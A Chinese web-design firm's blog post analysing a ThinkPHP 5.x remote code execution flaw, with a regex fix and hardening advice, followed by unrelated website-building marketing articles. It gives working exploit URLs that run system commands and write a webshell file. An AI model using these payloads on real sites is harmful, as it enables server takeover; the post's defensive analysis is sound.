【南京網(wǎng)站建設(shè)】THINKPHP 最新版本5.0到5.1高危漏洞爆發(fā)可直接提權(quán)GETSHELL

發(fā)布時(shí)間：2024-07-17來源：網(wǎng)站建設(shè)公司

THINKPHP漏洞修復(fù),官方于近日，對現(xiàn)有的thinkphp5.0到5.1所有版本進(jìn)行了升級，以及補(bǔ)丁更新，這次更新主要是進(jìn)行了一些漏洞修復(fù)，最嚴(yán)重的就是之前存在的SQL注入漏洞，以及遠(yuǎn)程代碼執(zhí)行查詢系統(tǒng)的漏洞都進(jìn)行了修復(fù)，官方本以為沒有問題了，但是在實(shí)際的安全檢測當(dāng)中發(fā)現(xiàn)，還是存在問題，還是可以遠(yuǎn)程代碼進(jìn)行注入，插入非法字符，提交到服務(wù)器后端中去。

關(guān)于這次發(fā)現(xiàn)的oday漏洞，我們來看下官方之前更新的代碼文件是怎么樣的，更新的程序文件路徑是library文件夾下的think目錄里的app.php，如下圖：

漏洞產(chǎn)生的原因就在于這個(gè)控制器這里，整個(gè)thinkphp框架里的功能對控制器沒有進(jìn)行嚴(yán)格的安全過濾于檢查，使攻擊者可以偽造惡意參數(shù)進(jìn)行強(qiáng)制插入，最根本的原因就是正則的表達(dá)式寫的不好，導(dǎo)致可以繞過。

在controller獲取控制器后，直接進(jìn)行賦值，但是并沒有對控制器的名進(jìn)行嚴(yán)格的檢測，導(dǎo)致可以使用斜杠等特殊符號來遠(yuǎn)程代碼注入。

我們來搭建一下網(wǎng)站的環(huán)境，apache+mysql+Linux centos系統(tǒng)，搭建好的測試環(huán)境地址是http://127.0.01/anquan ，我們可以直接在index.php后面?zhèn)卧旃魠?shù)，示例如下：

http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

直接get方式提交到網(wǎng)站中去，可以直接查詢到網(wǎng)站當(dāng)前根目錄的所有文件，截圖如下：

通過該漏洞也可以直接遠(yuǎn)程代碼注入執(zhí)行phpinfo語句，查詢當(dāng)前的php版本，路徑，擴(kuò)展，以及php.ini存放的地址，都可以看得到，構(gòu)造如下代碼即可。

http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

有些人可能會(huì)問了，既然都可以phpinfo,查詢目錄文件，可不可以getshell寫網(wǎng)站木馬文件到網(wǎng)站里呢? 答案是可以的，我們測試的時(shí)候是以一句話木馬代碼的寫入到safe.php文件里。

http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27%27%20>%20safe.php

關(guān)于這次thinkphp的漏洞利用以及分析到此就結(jié)束了，該漏洞屬于高危漏洞，危害嚴(yán)重性較大，很多升級更新補(bǔ)丁的網(wǎng)站都會(huì)受到攻擊，甚至有些網(wǎng)站會(huì)被掛馬，那么該如何修復(fù)thinkphp的漏洞呢?替換之前的正規(guī)則表達(dá)式即可,還需要對網(wǎng)站的目錄進(jìn)行權(quán)限部署，防止生成php文件,對網(wǎng)站上的漏洞進(jìn)行修復(fù)，或者是對網(wǎng)站安全防護(hù)參數(shù)進(jìn)行重新設(shè)置，使他符合當(dāng)時(shí)的網(wǎng)站環(huán)境。如果不懂如何修復(fù)網(wǎng)站漏洞，也可以找專業(yè)的網(wǎng)站安全公司來處理，國內(nèi)如Sinesafe和綠盟、啟明星辰等安全公司比較專業(yè).

針對于這個(gè)情況，我們要對其library/think/App.php代碼里的正規(guī)則表達(dá)式進(jìn)行更改，if (!preg_match('/^[A-Za-z][\w\.]*$/', $controller)) { throw new HttpException(404, 'controller not exists:' . $controller); }

如未特殊注明，文章均來源于網(wǎng)絡(luò)！轉(zhuǎn)載請注明來自：http://www.

閱讀過此文章的讀者，還閱讀過下面的文章

深圳網(wǎng)站制作好后來年...

 深圳網(wǎng)站制作好后來年到期了該怎么辦，不管是個(gè)人還是公司，要想制作好一個(gè)網(wǎng)站真的不容易，不僅僅需要做網(wǎng)站前期的規(guī)劃和策劃工作，還需要對網(wǎng)站建設(shè)的欄目，內(nèi)容進(jìn)行填充和建設(shè)，面對這一堆的要求和東西，整體還是比較麻煩和費(fèi)事的，所以，網(wǎng)站建設(shè)制作好之后，一定要注意來年的續(xù)費(fèi)問題，好多公司不注意這個(gè)問題，造成了網(wǎng)站后期打不開了，不能正常方面了，出現(xiàn)了問題才想起來網(wǎng)站沒有續(xù)費(fèi)，接下來我們來看看深圳網(wǎng)絡(luò)公司是如何建議的。 1.域名到期的影響  一般情況下，網(wǎng)站域名需要一年進(jìn)行一次續(xù)費(fèi)，也可以一次購買多年，如果域名到期沒有及時(shí)續(xù)費(fèi)，網(wǎng)站就會(huì)打不開，域名續(xù)費(fèi)期一般是一個(gè)月，過了這個(gè)時(shí)間就會(huì)進(jìn)入贖回期，這時(shí)候就不能續(xù)費(fèi)了。  2.服務(wù)器到期的影響  服務(wù)器到期與域名一樣，到期后網(wǎng)站同樣不能打開，如果之前網(wǎng)站在做推廣，會(huì)直接影響展現(xiàn)效果，長時(shí)間不續(xù)費(fèi)的話，網(wǎng)站數(shù)據(jù)就會(huì)全部刪除了，之前的努力就全白做了。  3.網(wǎng)站維護(hù)服務(wù)到期  有些網(wǎng)絡(luò)公司服務(wù)商會(huì)有網(wǎng)站維護(hù)費(fèi)用，一般都是一年為一個(gè)期限，如果到期后您沒有及時(shí)維護(hù)，網(wǎng)站出現(xiàn)問題后就不會(huì)有人給您維護(hù)，就會(huì)造成影響。影響最大的就是網(wǎng)站展現(xiàn)的效果。
深圳做網(wǎng)站公司做網(wǎng)站...

 深圳做網(wǎng)站公司做網(wǎng)站時(shí)要明白這些。其實(shí)做網(wǎng)站有的時(shí)候不僅僅是在做網(wǎng)站，更多的是在幫助其他公司在做網(wǎng)絡(luò)宣傳門戶，站在這個(gè)角度上你就知道你所承擔(dān)的責(zé)任了，作為現(xiàn)在公司網(wǎng)站建設(shè)不僅要符合時(shí)代潮流，更多的需要緊扣時(shí)代網(wǎng)頁設(shè)計(jì)特色和要求，只有這樣制作設(shè)計(jì)出來的網(wǎng)站才能更好的滿足現(xiàn)在人們的使用要求和觀念的，不管是在網(wǎng)站設(shè)計(jì)理念，網(wǎng)站布局規(guī)劃，以及網(wǎng)站內(nèi)容建設(shè)等等，這些方面都需要進(jìn)口時(shí)代主題和要求的，接下來我們來看看深圳網(wǎng)站制作公司是如何做的，需要做好那些方面的要求和規(guī)范呢？ 審美在變，網(wǎng)站設(shè)計(jì)要緊跟潮流 也許用戶訪問時(shí)，不會(huì)逐一閱讀網(wǎng)站內(nèi)容，但首先映入眼簾的一定是設(shè)計(jì)。也許網(wǎng)站在幾年前設(shè)計(jì)制作的確實(shí)很漂亮，但是我們無法否認(rèn)的事實(shí)是，用戶對網(wǎng)站設(shè)計(jì)的審美一直在不斷改變。這個(gè)比較容易對比，隨便找一個(gè)行業(yè)，然后通過百度搜索到十家網(wǎng)站，分別對應(yīng)年份和網(wǎng)站的網(wǎng)址，讓一個(gè)不知情的人去逐一打開并評判感受。大體趨勢是越是新近設(shè)計(jì)制作的網(wǎng)站，越容易贏得用戶的接受承認(rèn)。其實(shí)這就是用戶的真實(shí)感受，每年快速改版重做對于很多公司來說有些壓力，但是筆者認(rèn)為一般而言網(wǎng)站2-3年是需要重新設(shè)計(jì)制作快速的。一個(gè)通過網(wǎng)站尋找供應(yīng)商的用戶，其瀏覽網(wǎng)站一般也就幾十秒到幾分鐘時(shí)間，先進(jìn)的網(wǎng)站設(shè)計(jì)效果是吸引其深入了解進(jìn)而咨詢的較好方法。 技術(shù)在變，網(wǎng)站制作要貼合需求 周圍的一切都在發(fā)生著巨變，網(wǎng)站技術(shù)也是如此，此前被很多網(wǎng)站公司采用的ASP網(wǎng)站開發(fā)語言幾乎已經(jīng)沒人使用，相對于傳統(tǒng)的PC端網(wǎng)站，現(xiàn)在更多看重的是移動(dòng)端，公司設(shè)計(jì)制作的網(wǎng)站現(xiàn)在多為自適應(yīng)PC端、PAD端以及手持移動(dòng)終端的響應(yīng)式網(wǎng)站。誰也不知道網(wǎng)站技術(shù)會(huì)走向哪個(gè)方向，但是對于普通的企業(yè)而言，我們可以把握趨勢，至少每隔兩三年對網(wǎng)站重新快速設(shè)計(jì)制作。 企業(yè)在變，網(wǎng)站建設(shè)要適應(yīng)發(fā)展 網(wǎng)站總是為企業(yè)服務(wù)的，換句話說就是網(wǎng)站的設(shè)計(jì)制作需要跟上企業(yè)的發(fā)展步伐。現(xiàn)在急劇變化的市場面前，如果想立于不敗之地，企業(yè)的經(jīng)營策略一定在不斷調(diào)整優(yōu)化。作為給企業(yè)發(fā)展提供服務(wù)的網(wǎng)站，其理應(yīng)不斷調(diào)整不斷優(yōu)化以適應(yīng)公司需求。現(xiàn)在是互聯(lián)網(wǎng)時(shí)代，用戶了解公司更多的也是通過網(wǎng)絡(luò)，網(wǎng)站不僅是營銷的工具，更是企業(yè)品牌形象的展示窗口。由于人力成本的不斷升高，而網(wǎng)站設(shè)計(jì)更多的需要技術(shù)人員手工完成，所以真正定制開發(fā)的網(wǎng)站都價(jià)格不菲。但是同樣是網(wǎng)站建設(shè)公司網(wǎng)站改版也不一定就選擇定制，如果有合適的模板網(wǎng)站，也是不做的選擇。我們需要的是一個(gè)緊跟時(shí)代和用戶需求的網(wǎng)站，而非一定采用哪種方式實(shí)現(xiàn)它。
英文網(wǎng)站制作需要注意...

英文網(wǎng)站制作需要注意那些問題和事項(xiàng)。英文網(wǎng)站制作還是跟中文網(wǎng)站制作有比較大的區(qū)別的，應(yīng)為中文網(wǎng)站面對的客戶群體是國內(nèi)的用戶，而國內(nèi)的用戶對網(wǎng)站的使用習(xí)慣，要求都是跟國外不一樣的，從而在制作英文網(wǎng)站的時(shí)候，一定要注意，像這種英文網(wǎng)站制作還是需要從國外人使用網(wǎng)站的習(xí)慣，使用網(wǎng)站的一些喜好出發(fā)，只有這樣制作出來的網(wǎng)站滿足國外人的使用的，這是一個(gè)方面，另外一個(gè)方面就是國外網(wǎng)站面對的搜索引擎，也是不一樣的，國外的搜索引擎跟國內(nèi)有著比較大的區(qū)別的，搜索引擎也是制作英文網(wǎng)站必須要考慮的一個(gè)方面了，最后就是網(wǎng)站制作價(jià)格方面了，一般英文網(wǎng)站制作價(jià)格要比國內(nèi)的網(wǎng)站制作價(jià)格高一些，這是一定的，畢竟國外網(wǎng)站制作的細(xì)節(jié)要求，以及針對搜索引擎優(yōu)化方面還是有比較高的要求的，所以，這些都是工作量，也都是需要處理好這些方面的細(xì)節(jié)工作的。
網(wǎng)站設(shè)計(jì)公司的發(fā)展趨...

 網(wǎng)站設(shè)計(jì)公司的發(fā)展趨勢詳解，目前網(wǎng)頁設(shè)計(jì)公司慢慢的轉(zhuǎn)型升級成為一種綜合性的設(shè)計(jì)公司了，不僅僅是在網(wǎng)站設(shè)計(jì)了，如果單純的依賴于網(wǎng)站設(shè)計(jì)，對于這樣的公司來說現(xiàn)在還是很被動(dòng)的，并且目前的網(wǎng)站制作價(jià)格已經(jīng)白熱化了，競爭也是很大的情況下，好多公司已經(jīng)賺不到什么錢了，面對這樣的市場形式，作為網(wǎng)站設(shè)計(jì)公司要不斷的擴(kuò)大和嘗試新的方式和方法，實(shí)現(xiàn)公司業(yè)務(wù)的升級和轉(zhuǎn)型，這也是擺在深圳<a href="http://www.szbc888.com" target="_blank">網(wǎng)站制作公司</a>面對不可逾越的一個(gè)問題了，畢竟現(xiàn)在網(wǎng)站制作公司的活量不大，如果養(yǎng)一個(gè)專業(yè)的網(wǎng)頁設(shè)計(jì)技術(shù)團(tuán)隊(duì)專門作網(wǎng)站，根本養(yǎng)活不了這樣的公司的發(fā)展了，更多的還需要通過其他的渠道，其他的平臺上獲得更為有質(zhì)量的客戶，這也是當(dāng)下網(wǎng)站制作公司不得不面對的一個(gè)話題了。 <img src="static/picture/20231030113846_47114.jpg" alt="" /> <a href="http://www.szbc888.com" target="_blank">網(wǎng)頁設(shè)計(jì)公司</a>業(yè)務(wù)范圍擴(kuò)大，于是著這個(gè)網(wǎng)站制作行業(yè)市場需求量在逐漸的縮小，并且凡是使用到網(wǎng)站的多半集中在一些公司，單位方面的需求了，對于一些個(gè)人對網(wǎng)站的需求還是很少的，除非一些專業(yè)化路線的個(gè)人才會(huì)這樣做的，網(wǎng)站設(shè)計(jì)公司的轉(zhuǎn)型升級，不僅提升的服務(wù)質(zhì)量，更多的將服務(wù)方位不斷的擴(kuò)大，從而得到更好的市場群體，能夠?yàn)楦嗟氖袌隹蛻舴?wù)。
網(wǎng)站制作低價(jià)格策略已...

 網(wǎng)站制作低價(jià)格策略已經(jīng)成為網(wǎng)站制作行業(yè)的殺手锏，整個(gè)大環(huán)境不好的情況下，好多公司在制作網(wǎng)站的時(shí)候，已經(jīng)在想盡辦法降低網(wǎng)站制作的成本了，從當(dāng)初的網(wǎng)站制作就直接去搜索引擎上搜索網(wǎng)站制作公司了，而如今制作網(wǎng)站已經(jīng)發(fā)生變化了，從搜索引擎走向了淘寶，拼多多這些低價(jià)平臺了，并且這些平臺都是擔(dān)保交易了，好多的需要<a href="http://www.szbc888.com" target="_blank">制作公司網(wǎng)站</a>的商家慢慢轉(zhuǎn)向這個(gè)方面來了，所以制作出來的網(wǎng)站不是模板的就是仿制的網(wǎng)站，價(jià)格的確很低，并且效率也是很高的，這也是聰明的用戶慢慢的轉(zhuǎn)型和變化了，如果這些模板網(wǎng)站放在搜索引擎來的客戶的話，這些網(wǎng)站制作下來的費(fèi)用基本上在好幾千了，面對這樣的市場轉(zhuǎn)型和升級，這也讓好多網(wǎng)站制作公司尋找不同的出路了。 <img src="static/picture/20231030113212_16069.jpg" alt="" /> <a href="http://www.szbc888.com" target="_blank">深圳網(wǎng)站制作</a>的價(jià)格的確沒有那么低，但是作為一些低價(jià)平臺上的用戶，他們?yōu)榱藸幦〉娇蛻簦蛢r(jià)引流，從而實(shí)現(xiàn)了低價(jià)格制作網(wǎng)站的形式，作為網(wǎng)站制作公司，你這樣低價(jià)格去做的目的就只有一個(gè)，那就是辛苦轉(zhuǎn)不到錢的，都是轉(zhuǎn)一些辛苦錢而已，面對這樣的市場形式和要求，作為網(wǎng)站制作公司一定要不斷的提升網(wǎng)站制作的附加值，提升<a href="http://www.szbc888.com" target="_blank">網(wǎng)站制作</a>的質(zhì)量，讓用戶以質(zhì)量取勝，不能專門走低價(jià)格戰(zhàn)略，不然你的公司是發(fā)展不起來的，也作不大的，作為用戶而已，你公司小還可以這樣去做，如果公司發(fā)展到一定程度的去制作網(wǎng)站，這對于你的公司來說是滅頂之災(zāi)了，所以選擇網(wǎng)站制作公司還是要從專業(yè)的角度出發(fā)去幫助客戶解決實(shí)際的問題，從而實(shí)現(xiàn)網(wǎng)站制作公司的價(jià)值和效益。
深圳網(wǎng)站定制開發(fā)全流...

 深圳網(wǎng)站定制開發(fā)全流程詳解，作為網(wǎng)站定制開發(fā)公司接下來給大家普及一下網(wǎng)站定制究竟要經(jīng)過那些過程呢，前期的網(wǎng)站溝通肯定是少不了的，除此之外，網(wǎng)站備案這塊也是需要的，只要是正規(guī)的公司，正常的流程，網(wǎng)站備案也是需要做的，剩下的就是網(wǎng)站制作過程中的一些溝通了，接下來我們來看看<a href="http://www.szbc888.com" target="_blank">深圳網(wǎng)站制作</a>公司的一個(gè)標(biāo)準(zhǔn)的流程。 需求分析：通過對客戶業(yè)務(wù)的了解和與客戶對流程的討論對需求進(jìn)行基本建模，最終形成需求規(guī)格說明書 總體設(shè)計(jì)：通過分析需求信息，對系統(tǒng)的外部條件及內(nèi)部業(yè)務(wù)需求進(jìn)行抽象建模，最終形成概要設(shè)計(jì)說明文檔 詳細(xì)設(shè)計(jì)：此部分在對需求和概要設(shè)計(jì)的基礎(chǔ)上進(jìn)行系統(tǒng)的詳細(xì)設(shè)計(jì)（也包含部分代碼說明） 開發(fā)編程：對系統(tǒng)進(jìn)行代碼編寫 測試分析與系統(tǒng)整合：對所有功能模塊進(jìn)行模擬數(shù)據(jù)測試及其它相關(guān)性測試并整合所有模塊功能 現(xiàn)場支持：系統(tǒng)上線試運(yùn)行進(jìn)行現(xiàn)場問題記錄、解答 系統(tǒng)運(yùn)行支持：系統(tǒng)正式推產(chǎn)后，對系統(tǒng)進(jìn)行必要的維護(hù)和BUG修改